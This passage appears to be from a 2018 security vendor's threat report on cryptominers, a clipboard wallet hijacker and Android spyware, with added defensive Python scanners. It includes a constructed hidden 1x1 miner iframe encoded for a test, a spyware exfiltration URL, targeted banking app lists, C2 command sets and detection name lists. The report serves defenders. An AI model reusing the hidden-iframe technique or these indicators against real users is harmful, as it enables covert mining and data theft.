The code below downloads CoinMiner for the Windows architecture in use (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks whether a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner takes undivided possession of the victim's computer and uses its resources for mining cryptocurrency.
Some cryptominers have attracted the attention of the mass media and security researchers, which made them easier for users to spot. In Q2 these cryptominers learned to hide; CoinHive is the clearest example.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its snippet of code into your web page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on the subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter perpetrators found a way around this obstacle. They now use a sneaky trick to camouflage the presence of CoinHive: URL shorteners.
As a result, the malicious code on a web page looks like this:
The obfuscated malicious code on a web page
If we decode the string we find an iframe.
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1, to make the iframe as close to invisible as possible.
Now let's look at the URL https://cnhv.co. This is CoinHive's own short-link service: the visitor's browser mines a set number of hashes before being redirected to the destination, and the hidden iframe keeps that from ever being noticed.
And there we find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the web page's code but finds no sign of a cryptominer. So she concludes that something has gone wrong with her PC, while CoinHive quietly co-opts her computer to mine cryptocoins.
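The obfuscation chain above (encoded string, 1x1 iframe, short link to CoinHive) as an added example, not the report's own code: a Python scanner that expands the common `document.write()` wrappers (`unescape`, `atob`, `String.fromCharCode`) and then flags iframes that are effectively invisible or that point at a short-link host, in the raw markup and in each decoded layer. The sample page, the short-link ID "abc123" and the player domain are constructed; cnhv.co is the host named above.

```python
import base64
import re
from html import unescape as html_unescape
from urllib.parse import quote, unquote, urlsplit

# cnhv.co is the short-link host named above; a site owner would extend this set.
SHORTLINK_HOSTS = {"cnhv.co"}

# Constructed page (not the report's sample): the same 1x1 iframe written out twice,
# once through unescape() and once through atob(), next to a legitimate, visible player.
# The short-link ID "abc123" and the player domain are placeholders.
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/abc123" width="1" height="1" frameborder="0"></iframe>'
SAMPLE_PAGE = (
    "<html><body><h1>Watch for free</h1>"
    "<script>document.write(unescape('" + quote(HIDDEN_IFRAME, safe="") + "'));</script>"
    "<script>document.write(atob('" + base64.b64encode(HIDDEN_IFRAME.encode()).decode() + "'));</script>"
    '<iframe src="https://player.example.net/embed/42" width="640" height="360"></iframe>'
    "</body></html>"
)

JS_UNESCAPE = re.compile(r"""unescape\(\s*['"]([^'"]*)['"]\s*\)""")
JS_ATOB = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]*)['"]\s*\)""")
JS_FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def js_unescape(s):
    """JavaScript unescape(): %uXXXX for code points, %XX for bytes."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decoded_layers(html):
    """Return the strings that document.write()-style wrappers would emit at runtime."""
    layers = [js_unescape(m.group(1)) for m in JS_UNESCAPE.finditer(html)]
    for m in JS_ATOB.finditer(html):
        try:
            layers.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
        except ValueError:
            pass  # malformed base64, nothing to expand
    for m in JS_FROMCHARCODE.finditer(html):
        layers.append("".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()))
    return layers


def iframe_attrs(tag_body):
    attrs = {}
    for m in ATTR.finditer(tag_body):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def _size(value):
    digits = re.sub(r"\D", "", value or "")
    return int(digits) if digits else None


def find_hidden_iframes(html):
    """Flag iframes that are effectively invisible or point at a short-link host,
    looking at the raw markup and at every decoded script layer."""
    findings = []
    for text in [html] + decoded_layers(html):
        for m in IFRAME_TAG.finditer(text):
            a = iframe_attrs(m.group(1))
            src = html_unescape(a.get("src", ""))
            host = (urlsplit(src).hostname or "").lower()
            width, height = _size(a.get("width")), _size(a.get("height"))
            style = a.get("style", "").replace(" ", "").lower()
            reasons = []
            if (width is not None and width <= 1) or (height is not None and height <= 1):
                reasons.append(f"tiny frame {width}x{height}")
            if "display:none" in style or "visibility:hidden" in style:
                reasons.append("hidden by style")
            if host in SHORTLINK_HOSTS:
                reasons.append(f"short-link host {host}")
            if reasons:
                findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE):
        print(hit["src"], "->", ", ".join(hit["reasons"]))
```

Static expansion like this catches the simple wrappers seen in the example; a page that builds the string at runtime from several pieces needs a browser-based or headless scan that records what `document.write` actually emitted.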
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour the infected machine's resources but actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and numbers, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a gap they can exploit.
The cryptocurrency clipboard hijacker watches the clipboard for a copied wallet address. When it finds one, it swaps it for the address of a wallet under the attacker's control, so the unsuspecting owner of the infected machine delivers cryptocoins straight into the cybercriminals' hands. The substituted address is itself well formed, so the wallet's own checksum validation does not catch the swap; only comparing what is pasted with what was copied does.
The new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack:
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
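The swap above as an added example, not the report's code: a Python clipboard guard that remembers the address the user copied and raises an alert when the clipboard holds a different address at paste time, next to the Base58Check test a wallet performs, which an attacker's well-formed address passes. The hijacked transaction is simulated in-process with the two addresses from the page; the genesis-block coinbase address 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa serves as a known-valid checksum example. Bech32 (bc1...) addresses are shape-checked only.

```python
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Shape check only: legacy (1...) and P2SH (3...) base58 addresses, plus bech32 (bc1...).
ADDRESS_RE = re.compile(r"^(?:[13][1-9A-HJ-NP-Za-km-z]{25,34}|bc1[02-9ac-hj-np-z]{11,71})$")

# Addresses from the example above (victim's and attacker's), plus a known-valid one
# (the genesis-block coinbase address) for the checksum test.
VICTIM_ADDRESS = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
ATTACKER_ADDRESS = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"
GENESIS_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"


def b58decode(s):
    n = 0
    for ch in s:
        digit = B58_ALPHABET.find(ch)
        if digit < 0:
            raise ValueError(f"not a base58 character: {ch!r}")
        n = n * 58 + digit
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zeros = len(s) - len(s.lstrip("1"))  # each leading '1' encodes a 0x00 byte
    return b"\x00" * leading_zeros + body


def valid_base58check(addr):
    """The test a wallet performs: 1 version byte + 20-byte hash + 4-byte double-SHA256 checksum."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) != 25:
        return False
    expected = hashlib.sha256(hashlib.sha256(raw[:-4]).digest()).digest()[:4]
    return raw[-4:] == expected


def looks_like_address(text):
    return bool(ADDRESS_RE.match(text.strip()))


class ClipboardGuard:
    """Remembers the address the user copied and compares it with what is about to be pasted.
    A checksum-valid substitute passes the wallet's own validation, so only this comparison catches the swap."""

    def __init__(self):
        self.copied = None

    def on_copy(self, text):
        self.copied = text.strip() if looks_like_address(text) else None

    def check_paste(self, clipboard_now):
        now = clipboard_now.strip()
        if self.copied is None or not looks_like_address(now) or now == self.copied:
            return None
        return {
            "copied": self.copied,
            "pasted": now,
            "pasted_passes_base58check": valid_base58check(now),
        }


def simulate_hijack(user_copied, attacker_address):
    """Constructed scenario: the user copies text; if it is an address, malware rewrites the
    clipboard before the paste. Returns the guard's alert, or None when nothing was swapped."""
    guard = ClipboardGuard()
    guard.on_copy(user_copied)
    clipboard = attacker_address if looks_like_address(user_copied) else user_copied
    return guard.check_paste(clipboard)


if __name__ == "__main__":
    print(simulate_hijack(VICTIM_ADDRESS, ATTACKER_ADDRESS))
```

In a real deployment `on_copy` would hook the copy event in the wallet UI and `check_paste` would run on the paste; the point of keeping the checksum test beside it is to show that the hijacker's address is as valid as the victim's, so format validation alone offers no protection.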
Although cryptominers have decreased in number, they are coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, cybercriminals are not the only ones hunting for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, posing as innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It is distributed in three versions:
Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multiple spying abilities. It steals account details (contact ID, name, phone numbers and email address of the owner). It grabs SMS messages and associated information. It attempts to read call logs (number, name, type, duration), emails (email type) and contact photos. After extracting all the data, the malware encrypts it with AES and sends it to the attackers' server at http://cgalim.com/admin/hr/pu/pu.php?do=upload
KevDroid records the victim's every phone call, then encrypts the recording and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.
Version 3 of KevDroid takes photos, records calls and creates a list of the files on the device. It also extracts the web history, account and contact details and device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via the official Google Play store. The spyware was camouflaged as a chat application called Dardesh Instant App. When a user downloaded and ran it, the app covertly connected to the cybercriminals' command and control server and downloaded the spyware onto the device. From that moment the spyware kept track of every event on the infected device. Social networks were another means of distribution.
Version 1: Dardesh, Google Play Services, Instant Apps
Version 2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts their metadata and makes changes on the victim's device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has four different versions:
Version 1: Telegram Groups, انتخاب دھم
Version 2: Postrall, Yes For Referendum, انتخاب دھم
Version 3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version 4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS service
Record audio and send it to the command and control server
Upload image files
Collect information about installed applications
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some extra tricks:
Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend it brings a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message database and the related keys
Uploads the collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with a purposeful hunt for banking applications on the device. It wears trust-inspiring cover icons imitating Facebook and Google Chrome.
Versions 1 to 3: FaceBook, Chrome
Disguises of Xloader
After infection Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contact details
Set Wi-Fi to always on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable the Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.
App / Distribution:
FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب (Tracker), اسپای ھاید (Spy Hide), Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송 (Live Adult Broadcast), Мобильный антивирус (Mobile Antivirus), droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배 (CJ Logistics Parcel), 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент (mobile client), Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Stalker Spy can remotely turn on the microphone on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of LokiBot. The second version of Mystery Bot is ransomware that encrypts files on external storage and deletes the originals after encryption. So we can call it a spy with a "007 licence".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:
Send_SMS: extract SMS content and send it to the C&C server
Send_USSD: send the USSD to the C&C server
Gethistory: monitor browser history
Start_AllApp: gather information about installed applications
Send_call: set the Intent action to make a call
Forward_call: forward incoming calls
ResForward_call: reset call forwarding
Go_Smsmnd: delete SMS content
Go_GetAlls: get SMS history
Dell_sms: delete SMS content in a conversation
Send_spam: send spam SMS
Start_Inject: call the injector class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot.
佐川急便 (Sagawa Express), 현대캐피탈 (Hyundai Capital)
Disguises of FakeSpy
It collects available information from the infected device and sends it to the C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp
Here are some commands from its command and control server:
contacts: get contact details and email ID
Mute: set action to mute
Mms: get MMS content
info: get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following banking applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can also block access to some apps and services, including Google Chrome, the Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, operates mostly on Iranian territory. It spreads through third-party app stores, social networks and messengers.
Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس (Stylish Text), تلگرام ھمھ کاره (All-in-one Telegram), Proxy, دوست یاب (Friend Finder), Telegram Ton, شارژ رایگان بگیر (Get Free Credit), App Master, Anti Rat, PlatformA, فالورگیر نامحدود (Unlimited Followers), اینترنت رایگان (Free Internet)
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes the infected device to WAP and SMS services, adding extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option. If the user clicks that button, the malware starts working in the background, subscribing the user to services she never ordered.
It comes to victims in the variety of disguises listed above.
4.1.11 CoinHive
The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps listed below, but one of the vectors is especially interesting.
Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is this possible? Imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for the purpose, downloads it and plants it on the victims' machines. What she does not know is that another cybercriminal had earlier infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.
This story neatly illustrates the state of cybersecurity in Q2: no one can feel totally secure, and even a predator can turn into prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and to understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" because of their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.
Finally, the timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), while Russian worm detections were spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected. Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, while French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms mail copies of themselves to addresses harvested from the victim, and they are nasty in that many can also travel between victim computers by other means, for example via exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
The timeline shows the primary Email Worm outbreaks during Q2 2018: Russia experienced rather frequent Email Worm challenges, Germany had the densest concentration at the beginning of June, and Poland saw the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and attackers take advantage of this to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may use the Gnutella p2p protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
The timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of the well-known Yahos IM Worm, which in 2012 led the FBI to arrest 10 people for spreading banking malware via social networks with Yahos.
The timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once installed on a system or network they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal authentication, often used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be a separately installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected in Q2 2018 was DarkComet, a remote access trojan (RAT) that is now fully 10 years old. This malware lets an attacker control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in the timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot reach another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries, especially developing countries, were affected.
The timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the wooden horse of Greek mythology, because their malicious functionality is hidden inside seemingly useful or benign programs. Typically a Trojan grants a remote attacker the same rights and privileges as the local user, and it can be used for many kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds it to the Administrators group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
The timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
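Detection logic for the behavior attributed to Starter above, an account that is created and then immediately added to the local Administrators group, written here as an added example and not taken from Comodo's or Microsoft's analysis: it correlates Windows Security event 4720 (user account created) with a 4732 (member added to a security-enabled local group) that names the well-known BUILTIN\Administrators SID S-1-5-32-544. The host names, account names and the flat key=value export layout are constructed stand-ins for whatever your SIEM emits, and the ten-minute window is an assumption to tune.

```python
"""Correlate Windows Security events 4720 (user account created) and 4732
(member added to a security-enabled local group) to flag a freshly created
account that is immediately made a local administrator."""
from datetime import datetime, timedelta

LOCAL_ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known SID of BUILTIN\Administrators
WINDOW = timedelta(minutes=10)               # assumption: create-then-elevate within 10 min is suspicious

# Constructed sample export in a flat "timestamp key=value ..." form (not real logs, not EVTX).
SAMPLE_LOG = """\
2018-06-03T10:14:02Z EventID=4720 Computer=WS-042 SubjectUserName=alice TargetUserName=svc_remote
2018-06-03T10:14:03Z EventID=4732 Computer=WS-042 SubjectUserName=alice GroupSid=S-1-5-32-544 MemberName=WS-042\\svc_remote
2018-06-03T09:00:00Z EventID=4720 Computer=WS-017 SubjectUserName=Administrator TargetUserName=jsmith
2018-06-03T09:00:30Z EventID=4732 Computer=WS-017 SubjectUserName=Administrator GroupSid=S-1-5-32-545 MemberName=WS-017\\jsmith
2018-06-03T15:45:00Z EventID=4732 Computer=WS-017 SubjectUserName=Administrator GroupSid=S-1-5-32-544 MemberName=WS-017\\jsmith
"""


def parse_event(line: str) -> dict:
    """Parse one 'timestamp key=value ...' line into a dict; the timestamp becomes a datetime."""
    stamp, _, rest = line.strip().partition(" ")
    event = dict(pair.split("=", 1) for pair in rest.split())
    event["timestamp"] = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")
    return event


def account_name(member: str) -> str:
    """Strip a HOST\\ or DOMAIN\\ prefix from a member name and normalise case."""
    return member.rsplit("\\", 1)[-1].lower()


def correlate_create_then_elevate(log_text: str, window: timedelta = WINDOW) -> list:
    """Return one alert per (computer, account) that was created and then added to
    BUILTIN\\Administrators within `window`. Events are processed in time order so
    the 4720 is always seen before the 4732 it explains."""
    events = sorted((parse_event(ln) for ln in log_text.splitlines() if ln.strip()),
                    key=lambda e: e["timestamp"])
    created = {}   # (computer, account) -> time of the 4720
    alerts = []
    for ev in events:
        computer = ev.get("Computer", "")
        if ev.get("EventID") == "4720":
            created[(computer, ev["TargetUserName"].lower())] = ev["timestamp"]
        elif ev.get("EventID") == "4732" and ev.get("GroupSid") == LOCAL_ADMINISTRATORS_SID:
            acct = account_name(ev.get("MemberName", ""))
            born = created.get((computer, acct))
            if born is not None and ev["timestamp"] - born <= window:
                alerts.append({
                    "computer": computer,
                    "account": acct,
                    "created_at": born,
                    "elevated_at": ev["timestamp"],
                    "by": ev.get("SubjectUserName"),
                })
    return alerts


if __name__ == "__main__":
    for a in correlate_create_then_elevate(SAMPLE_LOG):
        print(f"ALERT {a['computer']}: {a['account']} created {a['created_at']:%H:%M:%S} "
              f"and made local admin {a['elevated_at']:%H:%M:%S} by {a['by']}")
```

Run against the constructed log, it reports the WS-042 case only: jsmith on WS-017 was created in the morning and promoted hours later, which this rule deliberately ignores. Widen WINDOW, or add a separate rule on any addition to the Administrators group, if that slower pattern is also of interest; domain accounts are logged under 4728/4756 rather than 4732 and need the same treatment.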
5.2.4 Exploits
Computer exploits are pieces of software, chunks of data or sequences of commands that take advantage of existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target's software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
Detections of any single exploit tend to be relatively rare, because the underlying vulnerability is typically patched soon after it is discovered.
In Q2 2018 the majority of exploits detected by Comodo targeted a favorite attacker vehicle, Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
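A triage scanner for the PDF-borne exploits discussed above, added here as an example and not part of Comodo's tooling: it counts the PDF name objects that exploit documents rely on, normalizing the #xx hex escapes that are commonly used to hide /JavaScript or /OpenAction from naive string matching, and flags a document that both carries script and has a trigger that fires on open. The two sample PDFs are constructed for the demonstration and contain no exploit.

```python
"""Triage a PDF for the features that exploit and dropper documents lean on:
auto-executing actions and embedded script, including names hidden behind
#xx hex escapes (/J#61vaScript is still /JavaScript to a real parser)."""
import re

# Name objects worth counting during triage. /OpenAction and /AA fire without a
# click; /JavaScript, /JS and /Launch carry the code; the rest can hide payloads.
RISKY_NAMES = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
               "/EmbeddedFile", "/RichMedia", "/ObjStm")

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
_OBJ_HEADER = re.compile(rb"\b\d+\s+\d+\s+obj\b")


def normalize_names(data: bytes) -> bytes:
    """Undo #xx escapes so obfuscated names compare equal to their plain forms."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_risky_names(data: bytes) -> dict:
    norm = normalize_names(data)
    counts = {}
    for name in RISKY_NAMES:
        # A name ends at a delimiter, so /JS must not match inside /JSX or similar.
        pattern = re.escape(name.encode()) + rb"(?![A-Za-z0-9])"
        counts[name] = len(re.findall(pattern, norm))
    return counts


def scan_pdf(data: bytes) -> dict:
    """Return counts plus a verdict: script present AND an on-open trigger."""
    if not data.startswith(b"%PDF"):
        raise ValueError("not a PDF header")
    counts = count_risky_names(data)
    has_script = counts["/JavaScript"] + counts["/JS"] + counts["/Launch"] > 0
    has_trigger = counts["/OpenAction"] + counts["/AA"] > 0
    return {
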